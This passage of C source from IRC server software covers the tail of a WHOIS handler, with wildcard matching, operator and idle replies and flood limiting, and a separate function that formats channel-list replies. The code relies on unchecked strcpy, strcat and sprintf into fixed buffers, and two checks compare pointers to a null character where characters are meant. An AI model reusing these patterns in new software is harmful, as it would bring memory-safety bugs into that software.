CHFL_CHANOP) *(buf + len++) = '@'; #ifdef HALFOPS else if (found_mode & CHFL_HALFOP) *(buf + len++) = '%'; #endif else if (found_mode & CHFL_VOICE) *(buf + len++) = '+'; } if (len) *(buf + len) = '\0'; (void)strcpy(buf + len, chptr->chname); len += strlen(chptr->chname); (void)strcat(buf + len, " "); len++; } } if (buf[0] != '\0') sendto_one(sptr, form_str(RPL_WHOISCHANNELS), mename, parv[0], name, buf); if(IsAnOper(sptr) || !HideServerOnWhois) { #ifdef SERVERHIDE if (!(IsAnOper(sptr) || acptr == sptr)) sendto_one(sptr, form_str(RPL_WHOISSERVER), mename, parv[0], name, NetworkName, NetworkDesc); else #endif if(acptr->user && acptr->user->vlink) sendto_one(sptr, form_str(RPL_WHOISSERVER), mename, parv[0], name, user->vlink->name, user->vlink->passwd); else { if(!IsService(acptr) || IsAnOper(sptr) || !HideServicesServer) sendto_one(sptr, form_str(RPL_WHOISSERVER), mename, parv[0], name, user->server, a2cptr?a2cptr->info:"*Not On This Net*"); } } /* if(IsAnOper(sptr) || HideServerOnWhois) */ if (IsIdentified(acptr)) sendto_one(sptr, form_str(RPL_WHOISIDENTIFIED), mename, parv[0], name); if (IsHelper(acptr)) sendto_one(sptr, form_str(RPL_WHOISHELPOP), mename, parv[0], name); if(IsOper(sptr) && WhoisExtension) { sendto_one(sptr, form_str(RPL_WHOISMODE), mename, parv[0], name, get_mode_string(acptr)); } if (user->away) sendto_one(sptr, form_str(RPL_AWAY), mename, parv[0], name, user->away); if(!IsHideOper(acptr) || IsOper(sptr)) { if (IsNetAdmin(acptr)) sendto_one(sptr, form_str(RPL_WHOISOPERATOR), mename, parv[0], name, rpl_nadmin); else if (IsTechAdmin(acptr)) sendto_one(sptr, form_str(RPL_WHOISOPERATOR), mename, parv[0], name, rpl_tadmin); else if (IsSAdmin(acptr)) sendto_one(sptr, form_str(RPL_WHOISOPERATOR), mename, parv[0], name, rpl_sadmin); else if (IsAdmin(acptr)) sendto_one(sptr, form_str(RPL_WHOISOPERATOR), mename, parv[0], name, rpl_admin); else if (IsOper(acptr)) sendto_one(sptr, form_str(RPL_WHOISOPERATOR), mename, parv[0], name, rpl_oper); else if (IsLocOp(acptr)) sendto_one(sptr, form_str(RPL_WHOISOPERATOR), mename, parv[0], name, rpl_locop); } #ifdef WHOIS_NOTICE if ((IsOper(acptr)) && ((acptr)->umodes & UMODE_SPY) && (MyConnect(sptr)) && (IsPerson(sptr)) && (acptr != sptr) && !is_silenced(sptr, acptr)) sendto_one(acptr, ":%s NOTICE %s :*** Notice -- %s (%s@%s) is doing a /whois on you.", me.name, acptr->name, parv[0], sptr->username, sptr->realhost); #endif /* #ifdef WHOIS_NOTICE */ if ((acptr->user #ifdef SERVERHIDE && IsAnOper(sptr) #endif && MyConnect(acptr))) sendto_one(sptr, form_str(RPL_WHOISIDLE), mename, parv[0], name, CurrentTime - user->last, acptr->firsttime); sendto_one(sptr, form_str(RPL_ENDOFWHOIS), mename, parv[0], parv[1]); return 0; /* continue; */ } /* wild is true so here we go */ if(nick[0]==':') /* real name match */ { name_match = &nick[1]; nick_match = NULL; } else if(nick[0]=='$') /* server name match */ { server_match = &nick[1]; nick_match = NULL; } else { host_match = strchr(nick,'@'); if(host_match) { if(*host_match) *(host_match++) = '\0'; user_match=nick; if(host_match=='\0') host_match="*"; if(user_match=='\0') user_match="*"; } else nick_match = nick; } for (acptr = GlobalClientList; acptr; acptr = acptr->next) { if (IsServer(acptr)) continue; /* * I'm always last :-) and acptr->next == NULL!! */ if (IsMe(acptr)) break; /* * 'Rules' established for sending a WHOIS reply: * * * - if wildcards are being used dont send a reply if * the querier isnt any common channels and the * client in question is invisible and wildcards are * in use (allow exact matches only); * * - only send replies about common or public channels * the target user(s) are on; */ /* If its an unregistered client, ignore it, it can be "seen" on a /trace anyway -Dianora */ if(!IsRegistered(acptr)) continue; user = acptr->user ? acptr->user : &UnknownUser; name = (!*acptr->name) ? "?" : acptr->name; if( (server_match && !match(server_match, user->server)) || (nick_match && !match(nick, name)) || (host_match && !match(host_match, acptr->realhost) && !match(host_match, acptr->host)) || (user_match && !match(user_match, acptr->username)) || (name_match && !match(name_match, acptr->info)) ) continue; ++hits; a2cptr = find_server(user->server); sendto_one(sptr, form_str(RPL_WHOISUSER), mename, parv[0], name, acptr->username, IsOper(sptr) ? acptr->realhost : acptr->host, acptr->info); found = 1; mlen = strlen(mename) + strlen(parv[0]) + 6 + strlen(name); for (len = 0, *buf = '\0', lp = user->channel; lp; lp = lp->next) { chptr = lp->value.chptr; if (ShowChannel(sptr, chptr)) { if (len + strlen(chptr->chname) > (size_t) BUFSIZE - 4 - mlen) { sendto_one(sptr, ":%s %d %s %s :%s", mename, RPL_WHOISCHANNELS, parv[0], name, buf); *buf = '\0'; len = 0; } found_mode = user_channel_mode(acptr, chptr); #ifdef HIDE_OPS if(is_chan_op(sptr,chptr)) #endif { if (found_mode & CHFL_CHANOP) *(buf + len++) = '@'; #ifdef HALFOPS else if (found_mode & CHFL_HALFOP) *(buf + len++) = '%'; #endif else if (found_mode & CHFL_VOICE) *(buf + len++) = '+'; } if (len) *(buf + len) = '\0'; (void)strcpy(buf + len, chptr->chname); len += strlen(chptr->chname); (void)strcat(buf + len, " "); len++; } } if (buf[0] != '\0') sendto_one(sptr, form_str(RPL_WHOISCHANNELS), mename, parv[0], name, buf); #ifdef SERVERHIDE if (!(IsAnOper(sptr) || acptr == sptr)) sendto_one(sptr, form_str(RPL_WHOISSERVER), mename, parv[0], name, NetworkName, NetworkDesc); else #endif sendto_one(sptr, form_str(RPL_WHOISSERVER), mename, parv[0], name, user->server, a2cptr?a2cptr->info:"*Not On This Net*"); if (user->away) sendto_one(sptr, form_str(RPL_AWAY), mename, parv[0], name, user->away); if (IsNetAdmin(acptr)) sendto_one(sptr, form_str(RPL_WHOISOPERATOR), mename, parv[0], name, rpl_nadmin); else if (IsTechAdmin(acptr)) sendto_one(sptr, form_str(RPL_WHOISOPERATOR), mename, parv[0], name, rpl_tadmin); else if (IsSAdmin(acptr)) sendto_one(sptr, form_str(RPL_WHOISOPERATOR), mename, parv[0], name, rpl_sadmin); else if (IsAdmin(acptr)) sendto_one(sptr, form_str(RPL_WHOISOPERATOR), mename, parv[0], name, rpl_admin); else if (IsAnOper(acptr)) sendto_one(sptr, form_str(RPL_WHOISOPERATOR), mename, parv[0], name, rpl_oper); #ifdef WHOIS_NOTICE if ((MyOper(acptr)) && ((acptr)->umodes & UMODE_SPY) && (MyConnect(sptr)) && (IsPerson(sptr)) && (acptr != sptr)) sendto_one(acptr, ":%s NOTICE %s :*** Notice -- %s (%s@%s) is doing a /whois on you.", mename, acptr->name, parv[0], sptr->username, sptr->realhost); #endif /* #ifdef WHOIS_NOTICE */ if ((acptr->user #ifdef SERVERHIDE && IsAnOper(sptr) #endif && MyConnect(acptr))) sendto_one(sptr, form_str(RPL_WHOISIDLE), mename, parv[0], name, CurrentTime - user->last, acptr->firsttime); if(hits>50) { sendto_one(sptr,":%s NOTICE %s :Aborting /whois output as flood prevention", mename, sptr->name); break; } } if (!found) sendto_one(sptr, form_str(ERR_NOSUCHNICK), mename, parv[0], nick); else sendto_one(sptr,":%s NOTICE %s :This /whois matched \2%i\2 user(s)", mename, sptr->name,hits); /* if (p) p[-1] = ','; */ } sendto_one(sptr, form_str(RPL_ENDOFWHOIS), mename, parv[0], parv[1]); return 0; }
void handlewhoischannels(int hooknum, void *arg) { channel **chans; char buffer[1024]; unsigned int bufpos; sstring *name; unsigned long *num; int i; char **args = (char **)arg; nick *sender = (nick *)args[0]; /* sender nick */ nick *target = (nick *)args[1]; /* target nick */ char *sourcenum = args[2]; /* source numeric */ /* do not show channels for +k service clients or IRC Operators * do not show channels for +n users * unless they whois themselves */ if ((IsService(target) || IsHideChan(target)) && sender != target) return; chans = (channel **)(target->channels->content); buffer[0] = '\0'; bufpos=0; /* Not handling delayed joins. */ for(i=target->channels->cursi-1;i>=0;i--) { /* Secret / Private channels: only show if the sender is on the channel as well */ if(IsSecret(chans[i]) || IsPrivate(chans[i])) { if (!getnumerichandlefromchanhash(chans[i]->users, sender->numeric)) continue; } name = chans[i]->index->name; if (bufpos + name->length > 508) { /* why 508? - need room for -@#channame\0 + 1 slack */ irc_send("%s", buffer); buffer[0] = '\0'; bufpos=0; } /* * 319 RPL_WHOISCHANNELS "source 319 target nick :channels" * "irc.netsplit.net 319 foobar barfoo :@#chan1 +#chan2 #chan3" * "irc.netsplit.net 319 foobar barfoo :-@#chan1 -+#chan2 -#chan3" */ if(buffer[0] == '\0') bufpos=snprintf(buffer, sizeof(buffer), "%s 319 %s %s :", getmynumeric(), sourcenum, target->nick); num = getnumerichandlefromchanhash(chans[i]->users, target->numeric); /* Adding these flags might make the string "unsafe" (without terminating \0). */ /* sprintf'ing the channel name afterwards is guaranteed to fix it though */ if (IsDeaf(target)) buffer[bufpos++]='-'; if (*num & CUMODE_OP) buffer[bufpos++]='@'; else if (*num & CUMODE_VOICE) buffer[bufpos++]='+'; bufpos += sprintf(buffer+bufpos, "%s ",name->content); } if (buffer[0] != '\0') irc_send("%s", buffer); }